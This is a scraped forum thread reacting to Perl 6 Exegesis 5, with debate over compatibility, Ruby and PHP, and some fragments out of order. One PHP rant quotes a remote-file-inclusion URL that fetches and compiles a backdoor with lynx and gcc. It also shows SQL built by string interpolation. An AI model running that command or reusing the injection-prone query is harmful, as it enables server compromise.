Damian Conway Publishes Exegesis 5
prostoalex writes "Come gather round Mongers, whatever you code,
And admit that your forehead's about to explode,
'Cos Perl patterns induce complete brain overload,
If there's source code you should be maintainin',
Then you better start learnin' Perl 6 patterns soon, For the regexes, they are a-changin'. This remix of Bob Dylan serves as an epigraph to Exegesis 5."
quoting from the article
"Even more importantly, as powerful as Perl 5 regexes are, they are not nearly powerful enough. Modern text manipulation is predominantly about processing structured, hierarchical text. And that's just plain painful with regular expressions. The advent of modules like Parse::Yapp and Parse::RecDescent reflects the community's widespread need for more sophisticated parsing mechanisms. Mechanisms that should be native to Perl."
Will these be compatible with the older, i mean backward compatibility, i certainly hope so.There's a lot of new syntax there, so let's step through it slowly.
this goes a real whoa over my head man. Seriosly i dont wanna be trolling, but i wish the language used was simpler. For a regex expert this is good, but for a newbie or mediocre level guy like me this is bad!! And there are not many free regex courses on the net!
My Aurora : http://www.youtube.com/watch?v=o91ZsGwJYyg
FB : https://www.facebook.com/TanveersPhotography
-Don
Take a look and feel free: http://www.PieMenu.com
I was excited for Perl 6 when it was first starting out, then I reading about all the stuff that is going to change, and got worried. Now, after reading this, I've come to the conclusions that I am sticking with Perl 5, as for my Web stuff, I'm finally taking theplunge and learning PHP. Perl 6 is starting to become a completely different language, all y stuff works now, and I don't feel like porting.
Objects in the blog are closer then they ap
Bob Dylan rolling in his grave knocked over my drink!
Oh, wait, he's not dead yet.
Carry on . . .
----------
I am an expert in electricity. My father held the chair of applied electricity at the state prision.
I know guys who can regex in their sleep, and they've been using mostly compatible syntax for YEARS! This new stuff looks completely different, and if perl isn't going to be backwards compatible, i forsee a huge backlash, or a AnotherGNUPerl fork or something. (AGP is taken... doh)
it's important to allow people to use existing skillsets while expanding into the new syntax.
Because I can't pronounce Exegesis. I can pronounce Perl.
Sorry!
Backward%20compatibility%20is%20over-rated
This might be a good thing, since parsing XML is becoming more important. Anyone get the same feeling, or am I smoking weed?
CPAN is a powerful resource. If all those modules get left behind, I fear we may end up with a more eloquent language in Perl 6 but with substantially less usability.
Ahhh, it's a good time to start using Ruby! I truly get happier and happier that I use Ruby with each Exegesis that comes out. I really don't understand what they're trying to accomplish with the language anymore. It's starting to look less like Perl and more like Befunge.
couldn't they have been gentler? However, if it lets me handle HTML easily, without having to learn all kinds of packages that do lots of things I don't need, then I'm all for it. John Roth Watch that speed limit sign on the learning curve!
- Why is Perl changing so much?!
- But what about my programs? Why break them?!
- Why would you want to break compatibility with other regular expression engines?
Some of this will be good for everyone. Some of it some of you won't like, but a lot of it you will. Give Perl 6 a chance, and don't react as if we've shot your pet.Because it needs to. Perl is the legacy of something like 15 years of development and evolution. It started as a simple text processing system, and is now used in every field of endevor where computers are used. There are some old things that needed to go, some new things that were needed and generally a need to re-examine the way "stuff" was done.
Perl 6 is two things (at least): a parser for Perl 6 and a back-end virtual machine, much like Java or C#. One of the design criteria for the release of Perl 6 is a Perl 5 compatible parser front-end that outputs Perl 6 virtual machine bytecode. This means that your Perl 5 programs will run with no modification in a Perl 6 environment (or at most a path change to the interpreter, that much is still under some debate).
Remember that Perl has been leading the pack in terms of regular expression handling for a long time. Now Perl is moving beyond regular expressions to grammar specification. This is a good thing, as long as the benefits of regular expressions are preserved.
(switching into a Simpson's reference)
So we'll march day and night
Glennross and Glenngarry
Our syntactical structures are subject
To the whims of god Larry...
The only surefire protection against Microsoft infections is abstinence. - The Onion
I only had time to skim the article, and anyway it would take anyone a while to absorb all that code. Here's the short summary:
Regex's in Perl have accumulated too much cruft to be called regular expressions anymore. So now they're full grammers.
That's right. Now you can pattern match with a very readable grammer syntax that is easily decorated with Perl code to do parsing. YACC for Perl. You can find packages for this on CPAN, but this is integrated with the language.
No whining about the bad old days of Perl regex syntax for me... now I'm actually excited by the prospect of needing to buy a new llama book.
Most of the Perl 6 changes seem to be for the better, but two in particular particularly gall me: changing arrow to dot, and changing ARGV to ARGS.
The rationale for losing arrow was that it made more operators available, and that it was more familiar to users of other OO languages. I suppose it's also easier to type; not only one less character, but no shift key. But it seemed like a change just to force old programs to be rewritten.
And ARGV? Simply because it was supposed to be old fashioned, unfamiliar, not obvious. BAH. Change for no reason other than to commit breakage and force a rewrite.
I will probably switch as time goes by, but to Ruby rather than Perl 6. If I'm going to have to touch every file, I may as well do it the right way.
Infuriate left and right
People--especially FUDchunkers--are missing the most important points:
.NET it would seem).
Almost all of the most useful Perl5 code of today will be runnable by Perl6 tomorrow: the compiler will fall back to perl5 and the VM is language neutral (even moreso that
In addition to running most perl5 modules as-is, Perl6 matching rules will have a perl5 backwards compatability mode built in so you can continue using the Perl5 regular expressions you know and love from Perl, Java, and everywhere else that's adopted them as needed in Perl6 code.
Yes, Perl6 is a rewrite and introduces a lot of deep CS concepts and ew syntax, but some care is being taken to assure that most Perl5 code will be runnable as is, while people learn about the power of some of the advanced tools Perl6 will provide.
Please Don't Panic (or incite others to): the apocolypses and exegises are technical documents, they are not meant to be smooth, easy reading or to reassure today's perlers that their hard won skills will be useful. They're meant to describe what's new and different and usually why. Don't be scared by the new and different, just as with existing Perl, you should be able to adopt the powerful new concepts and syntax as you need to without having to swallow it whole or unlearn everything you already know.
Perl6 will be stunningly more powerful, expressive, and provide (optionally) the safety features required for average coders to implement large systems while letting experts use extremely powerful tools like closures, continuations, intricate pattern matching that have mostly been accessible in academic languages to this point. And it will still allow convenient scripts to be generated if that's what you need to do.
Remember folks, other languages can make shitty code smell nice, but it's still shitty code and you wouldn't want to eat^Wmaintain it.
- Barrie
Anyway, in the article, it says there will be an :any modifier that matches a string any way possible, and gives the example:
Ok.. so i get how it returns "ahhh", "ahh", and "ah" - but how the heck does saying "match any string that looks like 'ah*' any way possible" return "a" ?
Is this an error in the article, or am i missing something extremely obvious?
Thanks!
Someone asked this very question at Damien's Pel 6 talk YAPC. According to Damien the "use CGI" (or whichever package) construct will tell the Perl 6 interpreter that the package being "use"'d is Perl 5 code. So the CPAN modules will still work.
Hopelessly pedantic since 1963.
I think that's not merely acceptable but actively encouraged. Perl6 is meant to be pretty much a different language from Perl5 - a nice, shiny new toy that will great for some things and less good for others. Just like, say, Java. But you don't feel apologetic about not porting your Perl5 programs to Java, and neither should you about not porting them to Perl6.
Will Perl6 be a better new language than Ruby, Python and the rest? Aye, there's the rub. No idea.
--
What short sigs we have -
One hundred and twenty chars!
Too short for haiku.
I first used perl back in version 3, something like 12 years ago. I first really learned perl, v4, about 9 years ago. It did everything I ever needed.
Then, perl 5 came out. I didn't bother "learning" it -- that is, I've been using it, and when I really need to, I've used some perl 5 features, but I've learned them as I go (by example), and I know I'm not really using the full capabilites. (plus, though I know what I'm doing, I don't always know what to call what I'm doing -- I got stumped the other day when someone asked me how to do pointers in perl. I drew a blank, not making the connection to all the weird hash magic I'd been doing lately. But I digress.)
Anyway, the bottom line of this is: Perl 5 looked interesting, but like more of the same, and wasn't really compelling for me to buckle down and learn all the new features. Perl 6, on the other hand, scares me. In a good way.
Here's a page-by-page description of how I read the article:
- Page 1: Hm. Looks like they're describing a grammar with regex. Cool.
- Page 2: I can intuitively match against a set of strings! Wild. These strings can be expressions themselves? Even better!
- Page 3: It's a grammar. A full, honkin, real, honest-to-goodness grammar. That I can match against. Are those angels I hear singing?
- Page 4: <head explodes>
- Page 5: <drools>
Seriously, though, I was concerned at first that I'd have to learn something new, crazy, and difficult (given how screwed-up much of perl 5 has seemed, at times). I'm impressed. I'm very impressed. Yes, I have to learn somthing new and crazy, but it's not at all difficult. In fact, I think I've already learned it.The power that this new system holds, and, more importantly, the simplicity of it all, is amazing.
So, unlike some other posters, I can't wait for Perl 6. When does this come out, again? And, more importantly, when can I buy the new book?
(also, was I the only one who expected, after the demonstration of matching method invocations, to be told that the entire source code for perl6 was just one giant RegEx/Grammar?)
nuf said. I don't recommend this bloated and utterly obfuscated language to any professional endavour.
But I agree its text matching capabilities are unique and good. Excellent. But that's it.
People who say "Perl is all I ever need" make me feel pain inside.
Gotta love the sense of humour. After describing one, two, and three colon rules (read the article, page three), they get to the potential fourth...
Basically the new rule (not 'regex') syntax seems to be bent on destroying Perl's "Line noise with a purpose" reputation..."The best argument against democracy is a five minute chat with the average voter."
--Winston Churchill
Here's why I'm not panicking. I read the apocalypse, and realized that I've never used any of the (?.....) expressions in a regular expression, and I've been Perling for 4 years and have written 2 formal parsing modules, and scads of scriptlets to pull data from very loosely formatted files.
/x flag is improving, but I'm ignoring most of apocalypse 5 (until I find that I need advanced parsing capabilities), relying on the assurances that most of what I do with regexes will be preserved, and happily awaiting topicalizers and hyper operators
I'm glad that support for the
Finally? No:
OK, so it was the fifth or sixth one ... but it's still the finest code in these islands!
Shop as usual. And avoid panic buying.
Could <head explodes> be a legal rule invocation? Rule with an argument?
Jeroen Nijhof
I hate reading docs online! I can't take my copmputer in the bathroom easily. I hope O'Reily will be publishing a book for 6.0 in a timely manner!
-- Many men would appreciate a woman's mind more if they could fondle it
From the exegesis:
The first thing to note is that, like a Perl 5 qr, a Perl 6 rx can take (almost) any delimiters we choose. The $hunk pattern uses {...}, but we could have used:
rx/pattern/ # Standard
rx[pattern] # Alternative bracket-delimiter style
rx<pattern> # Alternative bracket-delimiter style
rxforme # Délimiteurs très chic
rx>pattern< # Inverted bracketing is allowed too (!)
rxMuster # Begrenzungen im korrekten Auftrag
rx!pattern! # Excited
rx=pattern= # Unusual
rx?pattern? # No special meaning in Perl 6
rx#pattern# # Careful with these: they disable internal comments
Are these allowed for the sole purpose of creating new T-Shirt patterns?
Note: this is probably going to be horrendously biased because 99% of the PHP stuff I do is maintaining and customizing a vBulletin. For those who have ever dealt with this piece of crapware I'll say nothing more. Suffice it to say that if you run diff on, say, newthread.php and newreply.php the output is disturbingly short.
t _path=http://my.webserver.com/&phpEx=txt&cmd=lynx+ -source+http://my.webserver.com/1337-backdoor.c+|+ gcc+-o+/tmp/1337-backdoor or something like that then it's quite clear that things are getting absolutely fucking ridiculous. In fact the PHP team have realized this and forced you to use $HTTP_POST_VARS or whatever other four-mile-long identifier to get at your vars (oh, sorry it's $_POST now) ... well, at least if php.ini says so. Which you can't count on anyway so I always write a little routine to bomb out the global namespace (except for the superglobals) at the start of each of my scripts. Stupid and unnecessary.
... need I go on?
Look, I'm sorry but exactly what was supposed to be great about PHP? the fact that you can easily embed it in HTML code, that it integrates cleanly with MySQL and that you can pass args to it easily. Let us demolish each of these in sequence
* HTML embedding - Ever heard of MVC? I'm sorry, but if you compare something like this:
<ul>
<?php foreach ($users as $user) { ?>
<li><a href="user.php?userid=<?php echo $user->userid ?>"><?php echo $user->username ?></a></li>
<?php } ?>
</ul>
and, say, the equiv in Template Toolkit:
<ul>
[% FOREACH user = users %]
<li><a href="user.pl?userid=[% user.userid %]">[% user.username %]</li>
[% END %]
</ul>
now you tell me which looks neater? HTML-like templating syntax just looks dire because it all falls apart when you have to include stuff inside attributes. Not only is it ugly but it's unmaintainable. Want to skin your site in PHP? forget it. Want to skin it in perl/TT/CPAN templating engine of your choice? no problem, just supply a different base path to your template engine of choice. Of course most PHP coders have realized this so they've created their own templating engine, or use something like Smarty and just wrap everything in one great big PHP tag. Which quite frankly just defeats the entire point.
* Argument passing - this is hellish. Anything that comes in in a query string, cookie or post variable immediately enters your global namespace, where your often CRITICAL state variables are - hope you initialized them! I can't tell you how many times I got exploited by some stupid XSS exploit or the totally useless ability of include() to pull stuff in over HTTP. It's bad enough when a script kiddie just needs a unix system and the ability to use a compiler to root a machine but when 'h4xx0ring' can be done just by typing http://phpbb.mysite.com/includes/db.php?phpbb_roo
* MySQL integration - eh?! I'm sorry but I HATE the PHP MySQL API. The error handling is a joke so most people write their own wrappers around MySQL to catch errors and deal with them (that or it's back to checking the return value of every little thing. Thanks but if I wanted to do that I'd program in C). That and don't get me started on slashing. php.ini is set up so that your incoming variables may or may not get slashed. Again, you can't influence this or count on it if you've got shared hosting of some sort so either you've got to manually strip all the slashes out again or put them in - in which case you either have to deslashify something if you're using it internally or slashify it when passing it to mysql_query() to make sure someone doesnt take a great big shit all over your SQL. And that's if you're using MySQL. If you're using Postgres, there's a different API, and if you're using Oracle then there's a third. The fact that there's TWO different database abstraction systems built into the core of PHP (DBx and ODBC) and then some in PEAR shows that something is really horribly wrong.
Now compare to Perl DBI or Java JDBC or anything else which actually has a sane DB access API.
eval {
my $sth = $dbh->prepare('SELECT userid FROM user WHERE username = ?');
$sth->execute($username);
my $userid = $sth->fetchrow_array;
} if ($@) { confess "SQL Error: $@"; }
which in PHP looks like
if (!get_magic_quotes_gpc()) {
$username = addslashes($username)
}
$q = mysql_query("SELECT userid FROM user WHERE username = '$username'")
or die("Query failed: " . mysql_error());
if ($r = mysql_fetch_row($q)) {
$userid = $r[0];
}
I know which one I prefer. That and let's not forget the fact that every time you access a page, that page is parsed, its dependencies are parsed, initialization is performed, and then it handles your request. Also the standard library that comes with it is cack - everything is in the global namespace, there's no object orientation at all, parts of it look like the C standard library's been retrofitted into it because the designers were too damn lazy, it's inconsistent, there's several conflicting ways of doing everything and it's so badly designed that you're usually working AGAINST it than with it. (want to slurp a file? well you can use the file() command to make an array of lines, which you can join together again, or you can use readfile() which sends a file directly to the client, however you can get round that by using output buffering to capture it. Or you can use fopen() and the related commands to open the file, find its size, read it into a scalar then close it again. Aargh!)
Now, look, I must admit Perl isn't great either. mod_perl is fast as lightning but it's got a ton of idiosyncracies of its own (mainly in the way of including things, eg include paths, namespaces, etc) and a lot of weird side-effects that are far from obvious and get in the way most of the time. I've written my own mini-wrapper around it that irons most of it out but it's still quite a pain.
As for PHP though, it does have its place, but remember what PHP stands for - PHP Hypertext PREPROCESSOR (I think). As SSI on steroids with some ability to interface with MySQL, it's a great system. But writing things like messageboards or shopping carts or portals in PHP is sheer lunacy. I've managed a PhpBB and a vBulletin as well as writing a mini news system that integrates with vB so maybe my experience isn't that great and someone ought to hit me with a clue-by-four. But if you can, please do because from what I've seen I find it very hard to like this language.
Face it, until practical (it's supposed to be PRACTICALLY eclectic, remember) considerations are put in at least 50th place on the list of priorities, people will continue to avoid Perl. It's not that it doesn't have nice ideas, it's that they're put together really badly.
Trying to maintain Perl code, particularly someone else's, is impractical. Trying to memorise every little pecadillo of Perl unless you are a 24/7 hacker is impractical (and otherwise, you miss all its advantages anyway). Using Perl's regex for anything but trivial numbers of records is impractical. Mandating Perl for trivial simple administration scripts simply because of its all-encompassing features, thus requiring a full install of the ever growing perl environment, is impractical.
Perl was designed for the kind of person who, presented with perfectly functional, efficient code, always wants to demonstrate a "better way" to do it -- no matter how much better it isn't. There's More Than One Way To Do It, because the more ways I know, the smarter I am! Never mind how much more brainpower has to go into merely following code rather than the design behind it.
The kind of problem Perl is facing is being faced in many other "enthusiast-driven" projects. The emphasis is on project developer and project enthusiast enjoyment, and not on usability.
Which brings me back to my original Mathematica point. It was written for mathematicians and those in associated fields. It was not written for people who enjoy tracking development of a mathematical software package, by people whose mission it is to merely tinker with what seems "cool".
Fact: Perl is dying.
(joke, dammit)
You are upset that Perl 6 is changing significantly enough that you feel it could be classified as a different language. And you don't want to learn a new language so to solve your dilemma you are going to learn a different language? :)
but without the S
-c
I have discovered a truly remarkable proof which this margin is too small to contain.
Amen. Perl's great for 50 line scripts, crap for most of the stuff people try to use it for.
I'm surprised some chimp hasn't tried writing an operating system or a GUI word processor with it.
I'm a bit frustrated that they're fussin so much around regex when OO perl is a bit of a mess right now. The TMTOWTDI motto is a nightmare when it comes to OO because each developer has his own way of doing it and to build reusable class libs is tough! I would like to see more standardisation in that area - more than damian's OO book, which simply suggests a way of doing it, but there's no real accepted method, or no way of enforcing anything at all. I'd like to see some developments on the encapsulation front, for example!
Considering all of the learning required to go from Perl5 to Perl6 and the fact that Perl6 probably won't exist for a couple more years, I wonder if the growth in Ruby users (traffic is steadily growing on comp.lang.ruby) is attributable to Perl folks jumping ship?
Ruby seems to offer a lot to current Perl programmers, especially when it comes to OO programming - I don't think anyone will argue that Ruby's OO model is much cleaner and more beautiful than Perl's.
Perl6 does seem to have some promising features (like being able to define grammars as shown in the current exegesis) though.... however, I suspect that these ideas don't require wholesale changes to a language (this could be a Ruby module for example).
re: "the entire source code for perl6 was just one giant RegExGrammar"...
$foo++;
use grammar 'Python' {
foo++
use grammar 'Perl' {
print "Hi" if $foo==2;
}
}
RE: * HTML embedding
You can also do this:
<? foreach ($users as $user)
{
include "templates/user/usertemplate.php";
}
?>
Then usertemplate.php contains
<li><a href="user.php?userid=<?= $user->userid ?>"><?= $user->username ?></a>
or
<? echo "<li><a href="user.php?userid= $user->userid">$user->username</a>" ; ?>
The trick is if you tuck most (or all) of your html in the templates directory then you can have skinning. Just make multiple templates directories and keep track of which one you're pulling the content from. This forces you to split your html from your objects, and as a bonus you get more code reuse. Your object's html templates are neatly tucked away in their own directories.
RE: * Argument passing
Turn off register_globals and use $_REQUEST and the other superglobals to do what you need. Never trust user input, yadda yadda. This has been a weakness in the past, but now it's a bit harder to get burned. I shot myself in the foot a couple times and had to learn how to deal with this stuff. PHP is a newbie friendly language, but secure PHP takes some experience to get right.
RE: * MySQL integration
Agreed. About this time last year I finally rolled my own DB wrapper that does what I need. My gripe with most abstraction layers is that they may claim to be DB independant, but cater to the lowest common denominator: mysql. Sorry, but if I'm using a "real" database I'm going to break out the stored procedures, transactions and more. If I get to use stored procedures, then my overall approach is going to change enough to break the abstraction layer. Things may have improved, but the last time I looked at it I went with the db specific funtions. I'd like to see some improvement here.
More notes:
As far as the 'parse, parse, reparse and initialize' cycle, you can alleviate some of that with caching. I've rolled functions to do this by output buffering entire pages (or significant includes), placing them on disk or in the database and serving those to the users. It depends on how often you update your site, but for fairly static pages it works OK. You can also break out the Zend cache or other products if you want to 'do it right'.
I don't see a problem with three different ways to open a file. Each one has a use and a historical reason for existing. Each one also gets the job done for the general case. Yes the namespace is a bit cluttered but the docs are very good. It seems like a design goal for PHP has been to wrap every useful library they can. This brings in a bunch of the C style file operations. Then you get the design goal to make tools to build webpages. That gives you output buffering tricks and so on. Learning to deal with this is all a part of PHP.
Just because PHP makes it easy for a 'non-programmer' to submit a form to a database it doesn't mean that it is an easy language to use for large projects. Maintaining bad PHP is hell and refactoring can be problematic. However, I do think PHP is appropriate for portals, message boards, and online catalogs. You just need to take the right approach: Object orientation (or good procedural libraries), templates, php.ini tweaking, coding standards and so on. It's not the easiest language to scale up, but it can be done. The problem is that it is such an easy language to do litle things in, they screw up when they do big things with it. Just like Perl.
I know you were kidding but....
There is a Perl/Tk spreadsheet. The fact that the underlying data structures of the spreadsheet are exposed to the macro language allows for some pretty incredible formulas.
Someone once said:
"It is possible to write spagetti code in any language "
Remember that when you are using your favorite programming tool.
You can write very readable and clean code in Perl...
it just takes some dicipline.
Yeah, well, same for me, except that I started with perl 5.0xx (with very little Perl 4 before that - didn't do much with it, because the Big Honkin' ManPage was pain to read in DOS!)
I know that for me, Perl 5.6 was not that big of a change. ("Oh, I can use 'use warnings;' instead of '-w'? That's readable! Oh, and 'our ($a, $b, $c)' instead of 'use vars qw($a $b $c)'? Gets better!")
And I know Perl 6 is not going to be a porting nightmare, and will make Perl much more readable in long run. I heard, for example, that the hilariously obscure-sounding scalar(@arr) or unreadable-sounding $#arr+1 will be @arr.length (or something similar) there, which is only positive...
I will be happy when they implement a DWIM() function. That's Do What I Mean.
was I the only one who expected, after the demonstration of matching method invocations, to be told that the entire source code for perl6 was just one giant RegEx/Grammar?
/^<$code <perlgrammar>>$/ {
/usr/bin/perl in a nutshell.
That's correct, and has been Larry's plan since the beginning. The Perl6 eval will be a rule like so:
if
Parrot.execute $code.bytecode;
}
Add command-line handling and that's your
But because they're sooooo smart, they write things like this:
In other words, a raw variable in a Perl 6 pattern is matched as if it was a Perl 5 regex in which the interpolation had been quotemeta'd and then placed in a pair of non-capturing parentheses.
OK. OOOOK. I'm really looking forward to Perl 6 For Dummies. Now pardon me while I go back to reading something easy, like differential geometry.
But seriously, what really excites me about Perl 6 is Parrot. It's going to be just ultra-cool to be able to link to Python and Ruby (and C) with no fuss and no muss. To me, the rest is just syntactic sugar.
Find free books.
I thought it was "The determined programmer can write a FORTRAN program in any language." Or something.
"How can you claim that you are anti-crack, while still writing a window manager?" — Metacity README